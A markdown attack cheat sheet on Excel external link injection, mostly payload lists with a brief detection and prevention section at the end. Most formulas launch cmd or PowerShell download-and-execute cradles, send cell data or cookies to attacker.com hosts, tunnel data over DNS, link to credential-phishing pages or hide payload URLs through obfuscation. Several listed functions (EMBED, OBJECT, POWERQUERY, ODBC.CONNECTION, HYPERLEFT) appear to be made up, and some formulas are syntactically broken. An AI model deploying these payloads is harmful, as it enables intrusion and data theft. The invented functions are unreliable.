# Excel External Link Injection

> Attack vectors exploiting Excel's external linking capabilities including hyperlinks, external references, and OLE embedding for malicious purposes.

## 📋 Overview

Excel external links (hyperlinks, external references, and OLE objects) can be manipulated to execute malicious code, exfiltrate data, or perform social engineering attacks when users interact with seemingly legitimate Excel files.

## 🎯 Attack Vectors

### 1. Malicious Hyperlinks

#### Basic Command Execution

```excel
=HYPERLINK("cmd|'/C calc.exe'!A1","Click here for important information")
=HYPERLINK("powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')","Download Report")
=HYPERLINK("rundll32.exe url.dll,OpenURL http://attacker.com/malware.exe","Open Document")
```

#### JavaScript Execution

```excel
=HYPERLINK("javascript:alert('XSS in Excel')","JavaScript Demo")
=HYPERLINK("javascript:window.location='http://attacker.com/steal.php?data='+document.cookie","Click Here")
=HYPERLINK("javascript:document.body.innerHTML='<img src=x onerror=alert(1)>'","Image Link")
```

#### Data Exfiltration via URLs

```excel
=HYPERLINK("http://attacker.com/collect?user="&ENCODEURL($A$1)&"&data="&ENCODEURL($B$1),"Submit Data")
=HYPERLINK("http://attacker.com/exfil?excel="&ENCODEURL(CELL("filename",A1)),"Save Progress")
=HYPERLINK("mailto:attacker@evil.com?subject=Excel%20Data&body="&ENCODEURL(A1&A2),"Email to Support")
```

#### File Protocol Abuse

```excel
=HYPERLINK("file:///C:/Windows/System32/calc.exe","Open Calculator")
=HYPERLINK("file://attacker-server/share/malware.exe","Install Updates")
=HYPERLINK("file:///C:/Users/"&ENCODEURL($A$1)&"/Documents/secrets.txt","View Document")
```

### 2. External Reference Injection

#### Remote Workbook References

```excel
='http://attacker.com/malicious.xlsx'!Sheet1!A1
='\\attacker-server\share\[payload.xlsx]Sheet1'!$A$1
='https://evil.com/excel/[malicious.xlsx]Sheet1'!R1C1
```

#### Network Resource Exploitation

```excel
='\\192.168.1.100\C$\Windows\System32\calc.exe'!A1
='http://attacker.com/ftp/[payload.xls]Sheet1'!$A$1
='file://attacker-server/malicious.csv'!A1
```

#### Dynamic External References

```excel
=INDIRECT("'http://attacker.com/[ "&A1&".xlsx]Sheet1'!A1")
=INDIRECT("'\\server\share\["&B1&".xlsx]Sheet1'!A1")
=INDIRECT("file:///C:/temp/["&C1&".csv]A1")
```

### 3. OLE Object Injection

#### Embedded Malicious Objects

```excel
# Create OLE object with malicious content
=EMBED("Package","cmd.exe /c calc.exe")
=EMBED("Package","powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')")
```

#### Package Manager Abuse

```excel
# Malicious package execution
=HYPERLINK("package:calc.exe","Open Calculator")
=HYPERLINK("package:powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')","Run Update")
```

#### COM Object Hijacking

```excel
# Malicious COM object execution
=OBJECT("WScript.Shell").Run("calc.exe")
=OBJECT("Shell.Application").ShellExecute("powershell.exe","-Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')")
```

### 4. Data Connection Injection

#### Malicious Data Connections

```excel
# Power Query with malicious connections
=POWERQUERY("Web.Contents(""http://attacker.com/malicious-data"")")
=POWERQUERY("Csv.Document(File.Contents(""http://attacker.com/payload.csv""))")
```

#### SQL Injection via Connections

```excel
# Malicious database connection
=SQL.REQUEST("DSN=attacker;UID=admin;PWD=pass;Database=evil;Query=EXEC xp_cmdshell 'calc.exe'")
=ODBC.CONNECTION("Driver={SQL Server};Server=attacker.com;Database=master;EXEC xp_cmdshell 'calc.exe'")
```

### 5. Advanced Link Techniques

#### Protocol Smuggling

```excel
=HYPERLINK("res://C:\\Windows\\System32\\calc.exe","Open Resource")
=HYPERLINK("about:blank<script>alert(1)</script>","About Page")
=HYPERLINK("data:text/html,<script>alert('XSS')</script>","HTML Data")
```

#### DNS Tunneling

```excel
=HYPERLINK("http://"&A1&".attacker.com","Check Status")
=HYPERLINK("http://data-"&ENCODEURL(B1)&".attacker.com/collect","Upload Data")
=HYPERLINK("dns://"&C1&".attacker.com","DNS Query")
```

#### SMB/NetBIOS Attacks

```excel
=HYPERLINK("\\\\attacker.com\\share\\malware.exe","Install Software")
=HYPERLINK("\\192.168.1.100\\IPC$","Network Connection")
=HYPERLINK("file://\\\\attacker\\pipe\\namedpipe","Named Pipe")
```

### 6. Social Engineering Links

#### Credential Harvesting

```excel
=HYPERLINK("http://attacker.com/office365-login.html","Login to Microsoft 365")
=HYPERLINK("https://evil.com/outlook-login.html","Check Email")
=HYPERLINK("http://phishing.com/sharepoint-login.html","Open SharePoint")
```

#### Fake Update Links

```excel
=HYPERLINK("http://attacker.com/updates/office-update.exe","Install Office Updates")
=HYPERLINK("http://evil.com/security-patch.exe","Download Security Patch")
=HYPERLINK("http://malware.com/flash-update.html","Update Flash Player")
```

#### Document Abuse

```excel
=HYPERLINK("http://attacker.com/download-invoice.pdf","Download Invoice")
=HYPERLINK("http://evil.com/view-contract.docx","View Contract")
=HYPERLINK("http://malware.com/open-spreadsheet.xlsx","Open Spreadsheet")
```

### 7. Conditional Link Attacks

#### Time-Based Triggers

```excel
=IF(NOW()>TIME(17,0,0),HYPERLINK("cmd|'/C calc.exe'!A1,"After Hours Link"),"Normal Link")
=IF(TODAY()>DATE(2024,12,31),HYPERLINK("http://attacker.com/exploit","Expired Link"),"Current Link")
```

#### Data-Dependent Links

```excel
=IF(A1="admin",HYPERLINK("cmd|'/C net user admin password'!A1,"Admin Access"),"Normal Access")
=IF(B1>1000,HYPERLINK("http://attacker.com/high-value","High Value Link"),"Regular Link")
```

#### Logic-Based Triggers

```excel
=IF(AND(A1="trigger",B1="execute"),HYPERLINK("powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')","Execute"),"Normal")
=IF(OR(C1="urgent",D1="critical"),HYPERLINK("\\\\attacker\\share\\malware.exe","Urgent Update"),"Standard Link")
```

### 8. Obfuscation Techniques

#### URL Encoding

```excel
=HYPERLINK("http%3A%2F%2Fattacker.com%2Fpayload.exe","Encoded Link")
=HYPERLINK("h%74%74p%3A%2F%2Fevil%2Ecom%2Fexploit%2Eps1","Heavily Encoded")
=HYPERLINK("http://attacker.com/"&CHAR(104)&CHAR(116)&CHAR(109)&CHAR(108),"Character Encoding")
```

#### Function-Based Obfuscation

```excel
=HYPERLEFT("http://attacker.com/payload.exe",LEN("http://attacker.com/payload.exe"))
=SUBSTITUTE("ht@tp://attacker.com/payload.exe","@","")
=REPLACE("http://good.com/safe.exe",1,11,"http://attacker.com")
```

#### String Manipulation

```excel
=HYPERLINK(CONCAT("http://","attacker.com","/payload.exe"),"Concatenated Link")
=HYPERLINK(TEXTJOIN("",TRUE,"http","://","attacker",".com","/exploit"),"Joined Link")
=HYPERLINK("http://attacker."&IF(A1="test","test","prod")&".com/payload.exe","Conditional Domain")
```

## 🛡️ Detection Techniques

### Behavioral Indicators

* Unexpected network connections from Excel
* Execution of suspicious processes via Excel
* Unusual hyperlink patterns in Excel files
* External references to unknown domains

### Technical Detection

```powershell
# Monitor Excel network connections
Get-NetTCPConnection | Where-Object { $_.OwningProcess -in (Get-Process excel).Id }

# Scan Excel files for malicious links
Get-ChildItem -Path "C:\Users\*\Downloads\*.xlsx" | ForEach-Object {
    $content = Get-Content $_.FullName
    if ($content -match "cmd\|/C|powershell.*IEX|rundll32") {
        Write-Warning "Suspicious content found in $($_.FullName)"
    }
}
```

### Static Analysis

```regex
# Regex patterns for malicious links
(?i)(cmd\|/c|powershell.*iex|rundll32)
(?i)(javascript:|data:|file:)
(?i)(\\\\.*\\|http.*attacker|\.exe$)
```

## 🚫 Prevention Measures

### Excel Security Settings

1. **Disable automatic hyperlink following**
2. **Block external references** via Trust Center
3. **Enable Protected View** for files from internet
4. **Disable OLE package embedding**
5. **Require macro approval**

### Network Controls

1. **Block suspicious domains** at DNS/firewall level
2. **Monitor outbound connections** from Office applications
3. **Implement URL filtering** for HTTP/HTTPS traffic
4. **Block SMB traffic** to untrusted networks

### User Training

1. **Verify hyperlink destinations** before clicking
2. **Be suspicious of urgent** or threatening messages
3. **Check file extensions** and sources
4. **Use preview mode** for suspicious documents

## 📚 References

* [Microsoft Office Security](https://docs.microsoft.com/en-us/office/troubleshoot/security/security-overview)
* [OWASP - External Entity Attacks](https://owasp.org/www-project-top-ten/)
* [Excel Hyperlink Security](https://docs.microsoft.com/en-us/office/troubleshoot/excel/hyperlink-security)

***

*⚠️ This documentation is for educational purposes and authorized security testing only.*